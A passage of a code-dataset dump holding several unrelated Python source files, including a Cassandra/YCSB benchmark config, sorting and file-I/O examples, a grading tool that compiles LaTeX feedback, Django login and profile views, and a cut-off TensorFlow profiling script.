: 3, 'dc2' : 1, 'dc3' : 1\",\n# \"'dc1' : 1, 'dc2' : 1, 'dc3' : 1\",\n# \"'dc1' : 3, 'dc2' : 3, 'dc3' : 3\"]\nreplica_factor_list = ['1_1_1', '3_1_1', '3_3_3']\ndefault_replica_factor = '3_1_1'\n\nwrite_consistency_level_list = ['QUORUM']\ndefault_write_consistency_level = 'QUORUM'\n\nread_consistency_level_list = ['QUORUM', 'EACH_QUORUM']\ndefault_read_consistency_level = 'QUORUM'\n\n# read_repair_chance_list = [(0.0, 0.0), (0.2, 0.1), (0.3, 0.2), (0.4, 0.3)]\ndc_local_read_repair_chance_list = ['0.0', '0.2', '0.3', '0.4']\ndefault_dc_local_read_repair_chance = '0.0'\n\nread_repair_chance_list = ['0.0', '0.1', '0.2', '0.3']\ndefault_read_repair_chance = '0.0'\n\nload_balancing_strategy_list = ['rr', 'globalaware', 'localaware']\ndefault_load_balancing_strategy = 'rr'\n\nlb_dict = {0: \" -db CLTradeoffCassandraDB\", 1: \" -db CLTradeoffCassandraDB\", 2: \" -db CLTradeoffCassandraDB\"}\n\nsnitch_strategy_list = ['None']\ndefault_snitch_strategy = 'None'\n\nread_process_list = ['simple', 'digest']\ndefault_read_process = 'simple'\n\nserver_delay_in_ms_list = ['0', '30', '50']\ndefault_server_delay_in_ms = '30'\n\n\n# --> Set client parameters:\n\n# Set the number of insert operation in the YCSB load phase.\n# Used to set YCSB's property: recordcount\ninsert_count_list = ['1', '10', '100']\ndefault_insert_count = '1'\n\n# Set operation numbers for each client in the YCSB run phase.\n# Won't be achieved if the actual speed is limited by the ops and the execution time.\noperation_count_list = ['3000000']\ndefault_operation_count = '3000000'\n\n# The number of write/read clients.\nclient_count_list = ['10', '30', '50']\ndefault_client_count = '30'\n\n# Set ops : all clients' total operation numbers per second.\n# ops_list = ['60', '120', '180', '240', '300']\nops_list = ['300']\ndefault_ops = '300'\n\nexecution_second_list = ['10', '60', '300']\ndefault_execution_second = '60'\n\n# wait_time = [' -p waitBase=10 -p waitRandom=1', ' -p waitBase=20 -p waitRandom=1', ' -p waitBase=40 -p waitRandom=1']\n# default_wait_time = ' -p waitBase=10 -p waitRandom=1'\n\n# Set the proportion of read/update operations in the YCSB run phase.\nread_proportion_list = ['0.50', '0.80', '0.95']\ndefault_read_proportion = '0.80'\n\n# Set the average delay between clients and servers when clients send requests.\nclient_delay_in_ms_list = ['0', '5', '20']\ndefault_client_delay_in_ms = '5'\n\n# --> Set algorithm parameters.\nread_round_list = ['2', '1']\nwrite_round_list = ['2']\n\n# --> Set experimental repeat times.\nrepeat = 1\n\n# Record all parameters in a given order.\n# Result process will use the following two lists.\n# Also, trace file is named in the form of the following property orders.\nalgorithm_name_list = ['write_round', 'read_round']\n\nproperty_name_list = ['replica_factor', 'write_consistency_level', 'read_consistency_level',\n 'dc_read_repair_chance', 'local_read_repair_chance',\n 'load_balancing_strategy', 'snitch_strategy', 'read_process', 'server_delay_in_ms',\n 'insert_count', 'operation_count', 'client_count', 'ops',\n 'execution_second', 'read_proportion', 'client_delay_in_ms',\n ]\nproperty_values_list = [replica_factor_list, read_consistency_level_list, read_consistency_level_list,\n dc_local_read_repair_chance_list, read_repair_chance_list,\n load_balancing_strategy_list,\n snitch_strategy_list, read_process_list, server_delay_in_ms_list,\n insert_count_list, operation_count_list, client_count_list,\n ops_list, execution_second_list, read_proportion_list, client_delay_in_ms_list,\n ]\nproperty_map = dict(zip(property_name_list, property_values_list))\n\n# Set default parameter values.\ndefault_value_list = [default_replica_factor, default_write_consistency_level, default_read_consistency_level,\n default_dc_local_read_repair_chance, default_read_repair_chance,\n default_load_balancing_strategy,\n default_snitch_strategy, default_read_process, default_server_delay_in_ms,\n default_insert_count, default_operation_count, default_client_count,\n default_ops, default_execution_second, default_read_proportion, default_client_delay_in_ms\n ]\ndefault_property_value_map = dict(zip(property_name_list, default_value_list))\n\n\n# You can set tunable parameters here.\nparameter_name_list = [\"client_count\", \"ops\", \"read_proportion\", \"replica_factor\", \"read_consistency_level\"]\nparameter_values_map = dict((name, property_map[name]) for name in parameter_name_list)\n\n\nif __name__ == '__main__':\n print ('Default parameter-values:{}'.format(default_property_value_map))\n print (\"All tunable parameters:{}\".format(parameter_values_map))","sub_path":"ycsb/bin/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"282550607","text":"#!/usr/bin/env python3\n\ndef insertion_sort(list):\n '''\n A python implementation of insertion sort\n '''\n\n for i in range(1, len(list)):\n item = list[i]\n\n j = i - 1\n while j >= 0 and item < list[j]:\n list[j+1] = list[j]\n j -= 1\n\n list[j+1] = item\n\n return list\n","sub_path":"sortanalytics/insertionsort_api.py","file_name":"insertionsort_api.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646726337","text":"\nclass Person:\n age = 5\n\n def __repr__(self):\n return repr(self.age)\n\nprint(Person)\nprint(repr(Person()))\n\n\n# Create a text file\n\nfile = open(\"testfile.txt\", \"w\")\n\nfile.write(\"Hello World\")\nfile.write(\"\\n\")\nfile.write(\"This is our new text file\")\nfile.write(\"and this is another line.\")\nfile.write(\"Why? Because we can.\")\n\nfile.close()\n\n# Reading a Text File in Python\n\n# prints the entire file on one line\nfile = open(\"testfile.txt\", \"r\")\n #print(file.read())\n\n# first five characters of stored data and return it as a string:\n #print(file.read(5))\n\n\n# If you want to read a file line by line – as opposed to pulling the content of the entire file at once – then you use the readline() function.\n #print(file.readline())\n\n\n\nfile2 = open(\"testfile2.txt\", \"w\")\n\nfile2.write(\"Hello World\")\nfile2.write(\"\\n\")\nfile2.write(\"This is our new text file\")\nfile2.write(\"\\n\")\nfile2.write(\"and this is another line.\")\nfile2.write(\"\\n\")\nfile2.write(\"Why? Because we can.\")\n\nfile.close()\n\n\n\n# Returns a certain amount of characters\nfile2 = open(\"testfile.txt\", \"r\")\n #print(file2.readline(8))\n\n\n\n# But what if we wanted to return every line in the file, properly separated? (returns a list)\n #print(file2.readlines())\n\n\n\n# Looping over a file object\n# When you want to read – or return – all the lines from a file in a more memory efficient, and fast manner, you can use the loop over method.\n\n#for line in file2:\n# print(line)\n\n'''\n\n\n# With Statement\n\n\nYou can also work with file objects using the with statement. \nIt is designed to provide much cleaner syntax and exceptions handling when you are working with code. \nThat explains why it’s good practice to use the with statement where applicable. \n\n'''\n\nwith open(\"testfile.txt\") as file:\n data = file.read()\n\n\nwith open(\"testfile.txt\") as f:\n for line in f:\n print(line)\n\n\n","sub_path":"Basic/Files.py","file_name":"Files.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"397720369","text":"import turtle \nwin = turtle.Screen() \nt = turtle.Turtle()\n\n# add some display options\nt.pensize(4) # increase pensize (takes integer)\nt.pencolor(\"red\") # set pencolor (takes string)\nt.shape(\"turtle\")\n\n#commands from here to the last line can be replaced\n\n# draw a N sided polygon\nnumSides = int(input(\"How many sides in the polygon?\"))\n \nangle = 360 / numSides\nsides = range(numSides)\n# distance = 300 / numSides # try different values \ndistance = 80\n \nfor i in sides:\n t.forward(distance)\n t.left(angle)\n\n\n# end commands\nwin.mainloop() # Wait for user to close window\n","sub_path":"turtle/turtle8_polygon.py","file_name":"turtle8_polygon.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"560935601","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 5 16:01:39 2019\n\n@author: simon\n\"\"\"\n\nfrom DataLoader import DataLoader\nimport mxnet.ndarray as nd\n\nTRAIN = \"/home/simon/Documents/TFE/Data/train.json\"\nword2vec = \"/home/simon/Documents/TFE/Data/word2vec-google-news-300.gz\"\n\ndl = DataLoader(word2vec, 1, 5, 300, padding=nd.zeros(shape=300), unknown=nd.random_normal(shape=(300,)), train_file=TRAIN)\n\nfor batch in dl.generate():\n print(batch)\n break","sub_path":"Code/models/Attention Mechanism/dataloader_test.py","file_name":"dataloader_test.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"529556380","text":"import time\nimport bisect\nclass DepthFirstPlanner(object):\n\n \n def __init__(self, planning_env, visualize):\n self.planning_env = planning_env\n self.visualize = visualize\n self.nodes = dict()\n \n\n def Plan(self, start_config, goal_config):\n plan =[]\n nodelist =[]\n if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n self.planning_env.InitializePlot(goal_config)\n Lowerlimits = self.planning_env.lower_limits;\n Upperlimits = self.planning_env.upper_limits;\n #self.planning_env.discrete_env.resolution = 1\n\n obj = self.planning_env.discrete_env\n \n\n a = obj.ConfigurationToGridCoord(goal_config)\n b = obj.ConfigurationToGridCoord(start_config)\n targetnodeid = obj.GridCoordToNodeId(a)\n currentnodeid = obj.GridCoordToNodeId(b)\n\n start = currentnodeid\n visited = []\n stack = [currentnodeid]\n\n\n vertex = currentnodeid\n count = 0\n #visited, stack = set(), [start]\n while stack and (vertex != targetnodeid):\n \n\n if vertex not in visited:\n visited.append(vertex)\n\n for value in (self.planning_env.GetSuccessors(vertex)): \n stack.append(value)\n\n\n #print plan_id[count], count\n #print self.planning_env.discrete_env.NodeIdToConfiguration(plan_id[count-1]),self.planning_env.discrete_env.NodeIdToConfiguration(current)\n\n count = count + 1;\n\n \n prevvertex = vertex\n vertex = stack.pop()\n \n plannodeid = visited\n #if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n #self.planning_env.PlotEdge(self.planning_env.discrete_env.NodeIdToConfiguration(vertex),self.planning_env.discrete_env.NodeIdToConfiguration(plannodeid[len(plannodeid)-1]))\n \n nodelist.append(vertex)\n\n \n\n plannodeid.append(targetnodeid)\n\n \n\n\n\n for i in range(0,len(plannodeid)):\n temp = (obj.NodeIdToGridCoord(plannodeid[i]))\n plan.append(obj.GridCoordToConfiguration(temp))\n\n return plan","sub_path":"code/DepthFirstPlanner.py","file_name":"DepthFirstPlanner.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"319545567","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 13 15:21:10 2019\n\n@author: ashka\n\"\"\"\n\nfrom os.path import join\nimport yaml, sys\nfrom GAME.texMaker import texMaker\nfrom GAME.question import Question\nfrom GAME.answer import Answer\nfrom GAME.fileNameManager import FileNameManager\nimport GAME\nimport shutil\nimport os\nimport subprocess\nfrom distutils import dir_util\n\ndef load_assignment(path, qdb = None, verbose = False):\n file = open(path,'r')\n assign = yaml.load(file)\n file.close()\n \n if qdb is not None:\n assign.question_db = qdb\n\n for q in assign.question_qids:\n this_Question = Question(join(assign.question_db,q))\n assign.questions.append(this_Question)\n if verbose: print('question is added: %s' % q)\n \n return assign\n\nmarkingSchem={'ub': [79.999999999, 69.999999999, 59.999999999, 49.999999999, 0],'name':['HD', 'D', 'C', 'P', 'N']}\nclass Assignment():\n def __init__(self,question_db=None,question_list=None,name=None,assignment_num=0,assignmentName=None, studentID=None, weights=None):\n self.questions = []\n self.candidate_questions=question_list\n self.name = name\n self.assignment_num = assignment_num\n self.marks = []\n self.mark = None\n self.feedbacks = None\n self.question_db = question_db\n self.fromTexFile = False\n self.assignmentName = assignmentName\n self.studentID = studentID\n self.returnLetterMark = True\n if weights is not None:\n self.weights = weights\n \n self.compilers = ['pdflatex']\n self.markingSchem={'ub': [79.999999999, 69.999999999, 59.999999999, 49.999999999, 0],\n 'name':['HD', 'D', 'C', 'P', 'N']}\n @property\n def letterMark(self):\n return self.convertToLetter(self.mark)\n \n def convertToLetter(self, m):\n m = 0 if m is None else m\n ms = markingSchem \n sorted_zip = sorted(zip(ms['ub'], ms['name']), key = lambda t: t[0])\n letterMark = sorted_zip[0][1]\n for i in sorted_zip:\n if m>i[0]:\n letterMark = i[1]\n return letterMark\n \n \n def markToShow(self, m):\n if self.returnLetterMark:\n return self.convertToLetter(m)\n \n else:\n return \"{:4.1f}\\%\".format(m*100)\n \n def condolidate_tex(self):\n assign_tex = ['\\\\BN']\n for q in self.questions:\n assign_tex.append('\\\\item')\n if not isinstance(q.text.tex,list):\n tex_to_add = [q.text.tex]\n else:\n tex_to_add = q.text.tex\n \n assign_tex += tex_to_add\n assign_tex.append('\\\\EN')\n return assign_tex\n\n def make_assignment_pdf_from_tex_file(self,path,verbose=False):\n pathToFolder = join(self.question_db, self.assignmentName)\n pathToFiles = join(pathToFolder, 'files')\n dirPath = os.path.dirname(path2pdf(path))\n tempPath = join(dirPath, 'temp')\n \n q = Question(pathToFolder)\n #shutil.copytree(pathToFiles, dirPath, symlinks=False, ignore=None)\n \n\n dir_util.copy_tree(pathToFiles, tempPath)\n \n # compile\n\n oldPath = os.getcwd()\n os.chdir(tempPath)\n compileTexself(self.compilers, q.text.tex[0])\n shutil.copy(path2pdf(q.text.tex[0]),dirPath)\n os.chdir(oldPath)\n dir_util.remove_tree(tempPath)\n \n \n def write_assignment_tex_file(self,path):\n texMaker(self.condolidate_tex(), path, name=self.name,anum=self.assignment_num)\n\n def make_assignment_pdf(self,path):\n self.write_assignment_tex_file(path2tex(path))\n makePdf(self.compilers,path)\n \n def save_input_files(self,directory):\n for q in self.questions:\n \n fnm = FileNameManager(self.studentID, self.assignment_num, q.qid)\n savingPath = join(directory, fnm.getInputFileName())\n q.text.save_inputs(savingPath)\n\n\n def save(self,path):\n '''\n with open(path, 'wb') as output:\n pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)\n '''\n assignment_questions = self.questions.copy()\n assignment_mark = None\n assignment_feedbacks = None\n if self.mark is not None:\n assignment_mark = self.mark.copy()\n if self.feedbacks is not None:\n assignment_feedbacks = self.feedbacks.copy()\n \n self.questions = []\n self.mark = None\n self.feedbacks = None\n \n file = open(path,'w')\n yaml.dump(self, file)\n file.close()\n \n self.questions = assignment_questions\n self.mark = assignment_mark\n self.feedbacks = assignment_feedbacks\n \n\n \n def generate_question_list(self,verbose=False):\n for q in self.candidate_questions:\n \n \n self.questions.append(Question(join(self.question_db,q)))\n if verbose: print('question is added: %s' % q)\n self.get_question_qids()\n \n \n \n def get_question_qids(self):\n self.question_qids = []\n for q in self.questions:\n self.question_qids.append(q.qid)\n \n \n def mark_and_get_feedbacks(self,result_path_list):\n self.mark = 0 \n self.feedbacks = []\n for i, q in enumerate(self.questions):\n print(result_path_list[i])\n r = q.marking.result_loader(result_path_list[i])\n try:\n m, f = q.marking.marker(q.text.inputs, r)\n except Exception as e:\n m = None\n errorString = 'Marker encountered a problem! Error: %s' % repr(e)\n errorString = errorString.replace('_','\\_')\n errorString = errorString.replace('$','\\$')\n f = [errorString]\n m = 0 if m is None else m\n \n self.marks.append(m)\n \n if 'weights' in self.__dict__:\n self.mark += m * self.weights[i]\n else:\n self.mark += m / len(self.questions)\n \n self.feedbacks.append('Feedback for %s' % q.qid)\n self.feedbacks += f\n self.feedbacks.append(\"Mark for this part = %s\" % self.markToShow(m))\n self.feedbacks.append(' \\\\noindent\\\\rule{8cm}{0.4pt} ')\n self.feedbacks.append(' \\\\noindent\\\\rule{8cm}{0.4pt} ')\n self.feedbacks.append(\"\\\\textbf{Total mark = \" + self.letterMark + \"}\")\n self.feedbacks.append(' \\\\noindent\\\\rule{8cm}{0.4pt} ')\n \n \n \n def write_feedback_file(self,path,name=None,assignment_num=None):\n \n texMaker(self.feedbacks,path2tex(path),name=name,anum=assignment_num)\n \n\n\n def make_feedback_pdf(self,path,name=None,assignment_num=None):\n self.write_feedback_file(path2tex(path),name=name,assignment_num=assignment_num)\n makePdf(self.compilers, path)\n \n \n def path_manager(self):\n '''\n This should be organised better and should set results file names and \n other sutff.\n '''\n pass\n \n def get_marking_scheme(self):\n '''\n This should manage the marking scheme!\n '''\n pass\n \ndef compileTexself(compilers, texFile):\n #si = subprocess.STARTUPINFO()\n #si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n \n for command in compilers:\n subprocess.call(command + ' \"%s\"' % texFile, shell=True) \n\ndef path2tex(path):\n pre, ext = os.path.splitext(path)\n return pre + '.tex'\n\ndef path2pdf(path):\n pre, ext = os.path.splitext(path)\n return pre + '.pdf'\n\n\n\ndef makePdf(compilers, texFile):\n \n #shutil.copytree(src, dst, symlinks=False, ignore=None)\n \n dirPath = os.path.dirname(path2pdf(texFile))\n #shutil.copytree(src, dst, symlinks=True)\n shutil.copyfile(GAME.clsFile, join(dirPath, 'CURSUS.cls'))\n oldPath = os.getcwd()\n os.chdir(dirPath)\n #os.system(\"pdflatex %s\" % path)\n \n compileTexself(compilers, path2tex(texFile))\n '''\n si = subprocess.STARTUPINFO()\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n subprocess.call(\"pdflatex %s\" % path, startupinfo=si)\n '''\n os.chdir(oldPath)\n\nclass Student():\n def __init__(self, student_id):\n self.ID = student_id\n self.marks = {}\n self.feedbacks = {}\n\n def add_answer(self, input_path, result_path, question, verbous=True):\n\n qid = question.qid\n self.marks[qid], self.feedbacks[qid] = Answer(input_path, result_path, question).get_mark()\n if self.marks[qid] is None:\n if verbous: print(' Mark = None')\n else:\n if verbous: print(' Mark = %8.2f' % self.marks[qid])\n\n def make_feedback_file(self, out_path, anum=0):\n texMaker(self.feedbacks, path2tex(out_path), anum=anum)\n\n","sub_path":"GAME/assignment_old_2.py","file_name":"assignment_old_2.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"200961732","text":"from __future__ import absolute_import, division\nfrom __future__ import print_function\nimport autograd.numpy as np\nimport autograd.numpy.random as npr\nfrom autograd import grad\nfrom autograd.util import flatten\nfrom optimizers import adam\nimport matplotlib.pyplot as plt\n\ndef init_random_params(scale, layer_sizes, rs=npr.RandomState(0)):\n \"\"\"Build a list of (weights, biases) tuples,\n one for each layer in the net.\"\"\"\n return [(scale * rs.randn(m, n), # weight matrix\n scale * rs.randn(n)) # bias vector\n for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]\n\ndef neural_net_predict(params, inputs):\n \"\"\"Implements a deep neural network for classification. params is a list of (weights, bias) tuples.\n inputs is an (N x D) matrix. returns normalized class log-probabilities.\"\"\"\n for W, b in params:\n outputs = np.dot(inputs, W) + b\n inputs = np.tanh(outputs)\n return outputs\n\nif __name__ == '__main__':\n \n # Model and training parameters\n layer_sizes = [1,10,10,1]\n param_scale, step_size = 1.0, 0.1\n inputs = np.array([[-1.0],[-0.875],[-0.75],[-0.625],[-0.5],[0.5],[0.625],[0.75],[0.875],[1.0]])\n targets = np.array([[ 1.17],[ 0.92],[ 0.64],[ 0.30],[-0.23],[0.86],[1.07],[0.74],[0.34],[-0.10]])\n\n # Randomly initialize the neural net parameters\n init_params = init_random_params(param_scale, layer_sizes)\n\n # Define training objective, equivalent to the log_posterior of the distribution\n def objective(params, iter):\n return np.sum((neural_net_predict(params, inputs) - targets)**2)\n\n # Use autograd to obtain the gradient of the objective function\n objective_grad = grad(objective)\n\n # Set up figure.\n fig1 = plt.figure(figsize=(12, 8), facecolor='white')\n ax = plt.subplot2grid((4,3),(0, 0), colspan = 3)\n ax2 = plt.subplot2grid((4,3),(3, 0))\n ax3 = plt.subplot2grid((4,3),(2, 0))\n ax4 = plt.subplot2grid((4,3),(3, 1))\n ax5 = plt.subplot2grid((4,3),(2, 1))\n ax6 = plt.subplot2grid((4,3),(3, 2))\n ax7 = plt.subplot2grid((4,3),(2, 2))\n plt.ion()\n plt.show(block=False)\n\n def print_function(params, iter, gradient):\n \"\"\" Plot data and functions. \"\"\"\n plot_inputs = np.linspace(-8, 8, num=400)\n outputs = neural_net_predict(params, np.expand_dims(plot_inputs, 1))\n ax.cla()\n ax2.cla()\n ax3.cla()\n ax4.cla()\n ax5.cla()\n ax6.cla()\n ax7.cla()\n ax.plot(inputs, targets, 'bx')\n ax.plot(plot_inputs, outputs)\n ax.set_xlabel(\"Possible Inputs\")\n ax.set_ylabel(\"Neural Network Outputs\")\n ax.set_ylim([-2,2])\n plt.draw()\n ax2.matshow(params[0][0].T, cmap='cool')\n ax2.set_xlabel(\"Hidder Layer 1 (Incoming Weights)\")\n ax3.matshow(np.array([params[0][1]]).T, cmap='cool')\n ax3.set_ylabel(\"Hidder Layer 1 Bias\")\n ax4.matshow(params[1][0].T, cmap='cool')\n ax4.set_xlabel(\"Hidden Layer 2 (Incoming Weights)\")\n ax5.matshow(np.array([params[1][1]]).T, cmap='cool')\n ax5.set_ylabel(\"Hidder Layer 2 Bias\")\n ax6.matshow(params[2][0], cmap='cool')\n ax6.set_xlabel(\"Hidden Layer 2 (Outgoing weights)\")\n ax7.matshow(np.array([params[2][1]]), cmap='cool')\n ax7.set_ylabel(\"Output Bias\")\n #plt.savefig(str(iter) + '.jpg')\n plt.pause(1.0/60.0)\n\n # The optimizers provided can optimize lists, tuples, or dicts of parameters.\n optimized_params = adam(objective_grad, init_params, step_size=step_size,\n num_iters=100, callback=print_function)\n\n","sub_path":"test_code/visual_optimized_neural_net.py","file_name":"visual_optimized_neural_net.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"524772942","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n#driver = webdriver.Chrome(executable_path=\"E:\\chromedriver.exe\")\n\n\n#driver = webdriver.Firefox(executable_path=\"E:\\geckodriver.exe\")\n\ndriver = webdriver.Ie(executable_path=\"E:\\IEDriverServer.exe\")\n\ndriver.get(\"https://zeenyx.com/\")\n\nprint(driver.title) # Title of the page\n\nprint(driver.current_url)\n\n#print(driver.page_source) # gives the HTML source code\n\ndriver.close() # Close the browser\n","sub_path":"com/SeleniumBasics/LaunchBrowser.py","file_name":"LaunchBrowser.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"484450461","text":"from django.contrib import auth\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect, render_to_response, get_object_or_404\nfrom django.template.context_processors import csrf\nfrom .forms import UserCreateForm\nfrom posts.models import Posts\nfrom private_messages.models import Message\nfrom django.db import models\n\n\ndef login(request):\n if request.user.id:\n raise Http404\n args = {}\n args.update(csrf(request))\n args['current_user'] = request.user\n if request.POST:\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None:\n auth.login(request, user)\n return redirect('/posts/')\n elif user is None:\n try:\n possible_user = User.objects.get(email=username)\n user = auth.authenticate(username=possible_user.username, password=password)\n auth.login(request, user)\n return redirect('/posts/')\n except User.DoesNotExist:\n return redirect('/posts/')\n else:\n args['login_error'] = \"Пользователь не найден\"\n return render_to_response('login.html', args)\n\n else:\n return render(request, 'login.html', args)\n\n\ndef logout(request):\n auth.logout(request)\n return_path = request.META.get('HTTP_REFERER', '/posts/')\n return redirect(return_path)\n\n\ndef register(request):\n if request.user.id:\n raise Http404\n args = {}\n args.update(csrf(request))\n args['current_user'] = request.user\n args['form'] = UserCreateForm()\n if request.POST:\n newuser_form = UserCreateForm(request.POST)\n if newuser_form.is_valid():\n newuser_form.save()\n newuser = auth.authenticate(username=newuser_form.cleaned_data['username'],\n password=newuser_form.cleaned_data['password1'])\n auth.login(request, newuser)\n return redirect('/posts/')\n else:\n args['form'] = newuser_form\n return render_to_response('register.html', args)\n\n\ndef private_profile(request, username, **kwargs):\n user = get_object_or_404(User, username=username)\n if user != request.user:\n return public_profile(request, username, **kwargs)\n user_posts = Posts.objects.all().filter(user=user, check=True)\n user_posts_at_checkout = Posts.objects.all().filter(user=user, check=False)\n context = {\n 'current_user': request.user,\n 'email': user.email,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'user_posts_at_checkout': user_posts_at_checkout,\n 'user_posts': user_posts,\n }\n if request.user.id:\n context['count_new_messages'] = Message.objects.all().filter(models.Q(topic__recipient=request.user) |\n models.Q(topic__sender=request.user),\n read_at__exact=None).exclude(\n sender=request.user).count()\n return render(request, 'private_profile.html', context)\n\n\ndef public_profile(request, username, **kwargs):\n public_user = get_object_or_404(User, username=username)\n user_posts = Posts.objects.all().filter(user=public_user, check=True)\n context = {\n 'current_user': request.user,\n 'first_name': public_user.first_name,\n 'last_name': public_user.last_name,\n 'last_login': public_user.last_login,\n 'user_posts': user_posts,\n 'public_user': public_user,\n }\n if request.user.id:\n context['count_new_messages'] = Message.objects.all().filter(models.Q(topic__recipient=request.user) |\n models.Q(topic__sender=request.user),\n read_at__exact=None).exclude(\n sender=request.user).count()\n return render(request, 'public_profile.html', context)\n\n\ndef dispatch_user(request, username, **kwargs):\n try:\n user_for_profile = User.objects.get(username=username)\n if user_for_profile == request.user:\n return private_profile(request, username, **kwargs)\n else:\n return public_profile(request, username, **kwargs)\n except:\n return redirect('/posts/')\n","sub_path":"crud/authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"168158596","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#\n# blast.parse.py\n#\n# Copyright 2015 The University of Sydney\n# Author: Jan P Buchmann \n# Description:\n#\n# Version: 0\n\nimport sys\nimport argparse\nsys.path.append(\"/home/jan/simbiont/lib/\")\nimport blast.parser as blast\nimport blast.filters as bfilters\n\n\ndef parse_options():\n argparser = argparse.ArgumentParser(description='Parse BLAST output')\n argparser.add_argument('-evalue', type=float, default = 10**-6,\n help = 'max evalue. Default: 10**-6')\n argparser.add_argument('-aln_len', type=float, default = 0,\n help = 'min alignment length. Default: 0' )\n argparser.add_argument('-fields', type=str,\n default = 'qid,sid,ident,alnlen,evalue',\n help = 'show result fields. \\\n Default: qid,sid,ident,alnlen,evalue' )\n return vars(argparser.parse_args())\n\ndef main():\n options = parse_options()\n bp = blast.Parser.json(parse_options())\n bp.add_filters([bfilters.Hspfilter(options)])\n bp.show_filters()\n bp.parse()\n bp.result.show()\n #r.show_qry()\n return 0\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/blast/blast.parse.py","file_name":"blast.parse.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"300749630","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom app04 import views\nurlpatterns = patterns('',\n\n url(r'^ajax/$', views.Ajax),\n url(r'^add/$', views.Add),\n url(r'^userlist/$', views.Userlist),\n url(r'^update/$', views.Update),\n url(r'^chouti/$', views.ChouTi),\n url(r'^index/$', views.Index),\n url(r'^login/$', views.Login),\n url(r'^register/$', views.Register),\n url(r'^upload/$', views.UpLoad),\n url(r'^svnupload/$', views.SvnupLoad),\n url(r'^tar/$', views.Tar),\n url(r'^loaddir/$', views.LoadDir),\n \n)\n","sub_path":"app04/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147363152","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import mnist\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.python.profiler import model_analyzer\nfrom tensorflow.python.profiler import option_builder\n\n\nclass FLAGS:\n '''\n 定义模型相关参数\n '''\n\n def __init__(self):\n self.hidden1_dim = 128 # hidden1 layer 的维度\n self.hidden2_dim = 32 # hidden2 layer 的维度\n self.learning_rate = 1e-2 # 学习率\n self.batch_size = 100\n self.max_step = 100 # 最大的训练步骤\n self.stats_per_steps = 10 # 每隔10步搜集一次RunMetadata。 可以根据需要修改\n self.data_set_dir = '' # 替换为你的本地mnist数据集路径,如果你已经下载过\n\n\nTRAINING_FLAGS = FLAGS()\n\n'''\n定义网络模型,创建session。这段代码与tfprofiler无关,直接粘贴即可,不用读 \n网络模型不做修改,沿用原来的:hidden1 + hidden2 + softmax 三层架构, hidden1和hidden2都是(Wx+b)->Relu的路径。 \n在我的环境中默认都运行在gpu:0 上。\n'''\ndata_sets = input_data.read_data_sets(\n train_dir=TRAINING_FLAGS.data_set_dir, fake_data=False)\nimages_placeholder = tf.placeholder(tf.float32, shape=(TRAINING_FLAGS.batch_size,\n mnist.IMAGE_PIXELS))\nlabels_placeholder = tf.placeholder(\n tf.int32, shape=(TRAINING_FLAGS.batch_size))\n\nlogits = mnist.inference(images_placeholder,\n TRAINING_FLAGS.hidden1_dim,\n TRAINING_FLAGS.hidden2_dim)\nloss = mnist.loss(logits, labels_placeholder)\ntrain_op = mnist.training(loss, TRAINING_FLAGS.learning_rate)\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nmnist_profiler = model_analyzer.Profiler(\n graph=sess.graph) # 创建tfprofiler实例,作为记录、处理和显示数据的主体\n# 定义trace level为FULL_TRACE,这样我们才能搜集到包括GPU硬件在内的最全统计数据\nrun_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\nrun_metadata = tf.RunMetadata() # 创建RunMetadata, 用于在每次session.Run()时汇总统计数据\n\n'''\n循环执行session.Run(),搜集统计数据并添加到tfprofiler实例中\n'''\nfeed_dict = dict()\nfor step in range(TRAINING_FLAGS.max_step):\n images_feed, labels_feed = 